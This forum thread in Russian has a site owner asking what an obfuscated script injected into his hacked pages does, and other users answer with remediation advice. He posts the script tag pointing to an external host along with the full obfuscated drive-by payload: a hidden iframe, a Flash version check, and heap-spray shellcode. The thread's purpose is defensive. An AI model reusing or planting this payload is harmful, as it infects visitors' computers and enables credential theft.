Помогите расшифровать хакерский код

[Ser_Maxim]

Обращаюсь к профессионалам!

Извиняюсь если не в том раздел написал ну тут вроде на яве написано...

Взломали сайт и вписали во все страницы такую строку:

<script src=http://communicatieblog.nl/images/PEF7C6ABEE4703.php ></script>

Содержание файла скрипта:

// <script>
deRr=9;if((deRr<=13)&&document&&(N7ju=unescape))deRr='';KO8=N7ju('%'+deRr.toString())+deRr.toString();
var YWJgW='docX75men6et.wrn69te(X22n3cX64n69i76 stX79leX3di5cn22X70osi69tX69oX6en3aabsi6flX75X74X65i3b i6cefi74X3aX2d1000i70xn3b X74opX3an2d1000pxn3bi5ci22X3ei22)n3bfui6ecn74X69oX6ei20n69i373(i61n29n7bdoci75mi65i6et.wri69te(X22i3cX69n66ramX65 n73i72cn3di5cX22hX74tpn3aX2fX2fcommi75X6eX69caX74i69i65blogX2en6elX2fn69maX67ei73i2fPEF7CX36AX42n45E4i370X33.pX68pi3fn73n3dX62Si48Ir4sIDn26i69di3di22+n61X2bi22X5ci22i3eX3cX2fn69frami65n3ei22X29n3bn7dbX68BX63i3d0X3bvarX20sci6fden3di22i25u3190i25u99n430X25u0364i25i75304X30n25u408X42i25u8B0CX25u1C70X25uX38Bi41Dn25u0868X25u78E8X25u00X300X25u8Bi300X25u3i434n35X25u8B53i25uX30i3554X25u5i3678i25uEA01X25uC983X25u52X46Fn25u728i42X25n75n30120n25i754n31EEX25u31ADi25u9n39i44Bi25n75CX42C1X25ui301n30DX25u40i443X25i75n302i399X25u0554X25u75FX46i25u3X39F3i25u75FBn25u5EEAi25un35n45i38Bn25u0124n25uX366EBi25X75n30C8Bi25n758B4Bn25uX31i435EX25i75En42i301X25u048Bn25u018Bn25ui35Ei458i25ui46F5X42n25u50E0X25u49BFn25u0FEDn25uFFi37En25ui35ED3n25uX35056i25n75n35i3452n25u565X36X25uX42F50i25ui34B8n42i25uX35FE3n25uD3Fi46i25u015i39n25u85CEi25u5n38C0n25u02E3i25ui45975i25u5X30i358X25uC629X25u94n38Dn25u20n336X25uA1D5X25u0161X25u30i35n34X25u83FCX25i7504EX45i25uF075n25n7531n433i25uB6Fi36i25uX35B30n25u406An25uX43152n25u0n34E2X25u5652X25u54BFn25n75AFCAn25uFi46n39X31X25n75i35X30D3X25uX30CE8i25uX300i30n30i25u77i300X25u6n4569n25X756i4569n25ui37X346i35n25n7564n32Ei25u6C6i43n25X75BF00X25u4E8En25uEC0Ei25X75D3FFX25X75i356X395i25uX3565n36i25un35656X25n7529BFi25uE84X34n25uX46FX357n25u56D3n25un30068X25i75n3000n31i25ui3568X34n25uEn3856i25uFF83i25uFFFi46i22X3bfui6ecti69on6eX20i65n6bi31X33()n7breturX6ei20trn75ei3bi7dn77n69X6edon77.n6fX6eerrori3dn65ki313X3bfun6en63tn69oi6e n6e73(i61)X7bvarn20kX2cs,i69i3bn69f(i6eX61vn69X67aton72.mX69meTypes.lX65i6en67thn26i26(kn3dX6ei61vn69gator.plugi69X6es)X29fn6fi72(i69i3dn30i3bX69X3ck.len6egthX3bi69++)X7bsX3dkn5bi69n5di2en6eami65X3bX69f(s.i69n6en64exOf(an29i3en3d0)rn65n74X75ri6e ki5bn69n5dX3bn7dreturn6e i30i3bn7dbhBn63n3d0i3bX58dli69tX3d0X3bfun6ei63tX69on6e s73n28n61)X7bi69f(ai5b0n5dn3di3d9X29X7bX58dlX69tn3di61X5b2i5di3c1i324i3bi62hBcX3d(ai5b2n5di3e16X29n26n26(n61X5b2i5dX3c24X36X29n3bi7delse n69fi28an5b0i5di3dX3dX310)bhBcX3dan5b2i5di3c23X3bbhi42cn3dbhn42ci26X26(i6eavX69gati6fi72X2euserAi67ei6etn2etoLi6fweX72i43i61sei28)X2en69X6edX65xOX66(n22san66n61rn69i22)X3di3dn2di31)i3bn7di69X66((X78n3dn6en37n33n28i22FlX61i73hX22))n26n26n28xX3dx.dei73i63i72i69ptn69on6en29)s73(X78n2erepln61ce(n2f(n5bai2dX7aAi2dZX5di7cX5csn29+i2f,i22i22).ri65placi65n28n2f(i5cs+rn7cn5cs+bn5bi30X2d9i5d+)X2f,n22i2ei22).n73pli69t(i22.X22))n3belsi65 tryn7bsi373n28n28i6eew AX63tX69n76en58On62ject(X22Shockwn61vei46lan73hn2eShi6fckwaveFi6casi68X22))X2eGetX56arX69ablen28X22n24vn65rsX69i6fX6eX22n29.i73X70lX69X74X28i22 i22)i5b1i5d.X73pln69t(n22X2cn22))n3bn7dcatch(e)i7bX7di69f(i58X64X6cX69t)i697X33(3)i3bi69f(bX68X42c)i7bvan72 mi3di6eew Arran79X28X29,m1n3dun6eescaX70e(i22X25u0n38n308n25n750i38X30X38i22),sn3dui6en65X73cape(scode+i22n25u7i34n368i25i75n370i37X34i25uX32F3Ai25n756X332X46n25u6D6X46i25n75X3756DX25u69n36i45n25u6163i25u69X374X25u6265n25u6i466CX25u2n4567X25ui36C6EX25n756i392Fi25uX3616Di25un365X367i25X752n4673n25u4X3550n25u3746X25u36X343X25u4241i25u4545n25u3734n25X75X3333n30X25i7570X32En25X75n37068n25u7X33n33Fn25u62n33DX25u4853i25X7572n34X39i25u7n3334X25u4449i25u6X3926X25u3D64n25X753231X25i75X30n3000X22)n3bwhi69le(m1.i6cei6egn74i68i3cX3di332768)mX31+i3dmn31i3bm1n3dn6dX31.si75X62stri69n6eg(0n2c3i32X37i368i2dX73i2elX65n6egn74hi29i3bfor(var i69i3d0X3bi69X3c15X336i3bi69+X2b)mi5bX69n5dn3dX6dn31+X73n3bn69n373(X224X26zX3dn22+X28X58dn6cn69t+0))X3bn7di64ocui6dei6et.wn72i69ten28i22X3ci2fdi69vi3ei22X29i3b';
sKuu=YWJgW.replace(/[Xni]/g,KO8);eval(N7ju(sKuu));

//</script>

Пожалуйста скажите, что делает этот скрипт.
И что сейчас делать мне т.к. естественно, что я страницу с этой фигней открывал.

[Kolyaj]

Сообщение от Ser_Maxim

Пожалуйста скажите, что делает этот скрипт.

Какая разница? Обычно такие скрипты iframe на страницу добавляют.

Сообщение от Ser_Maxim

И что сейчас делать мне т.к. естественно, что я страницу с этой фигней открывал.

Менять пароли ftp, не хранить их в ftp-клиентах, проверяться на вирусы.

[subzey]

Лечитесь от троянцев. Судя по коду этот код успользует некую уязвимость в флеш-плеере, чтобы запустить произвольный код.

[Ser_Maxim]

Сообщение от Kolyaj

Обычно такие скрипты iframe на страницу добавляют.

А для чего этот IFRAME добавлять?
Просто после посещения такой страницы фаерфокс не запускался и с официального сайта тоже не мог его скачать.
Вот и хотелось бы понять это атака хакеров на браузер мозилы или еще что?

Сообщение от Kolyaj

Менять пароли ftp, не хранить их в ftp-клиентах, проверяться на вирусы.

А пароли ко входу на сайты тоже менять типа форумы т.п. или такие вещи злоумышленникам не интересны?
Пароль от кипера webmany тоже менять?
Видите вопросов много а времени исправлять менять все очень много займет, просто лишнего не хотелось бы делать.
Вот и обратился если кто хорошо разбирается в расшифровке таких скриптов, то что бы сказали что конкретно в этой гадости.

[Ser_Maxim]

Сообщение от subzey

Лечитесь от троянцев.

Проверил комп сразу нодом и отправил файл на анализ. полагаю имеет смысл сканировать комп только после того когда нод научится распознавать этот вирус если я его все таки подцепил?

[subzey]

Можете запустить msconfig и поискать «странные» процессы с именами типа «mswindowsserver32». Дальнейший комплекс мероприятий, наверное, Вам подскажут не на этом сайте.

[Ser_Maxim]

Ни каких посторонних процессов я не нашел в диспетчере задач

[Ser_Maxim]

subzey, вы сказали

Цитата:

код успользует некую уязвимость в флеш-плеере, чтобы запустить произвольный код.

а он ее использует когда я находжусь на странице с этим кодом и на которой есть какой либо плеер? или он загружается в копм и когда я потом загружу флеш-плеер вирус себя проявит?

[subzey]

Создает iframe, в котором яваскриптом создается объект SWF и что-то подгружает. Самостоятельно.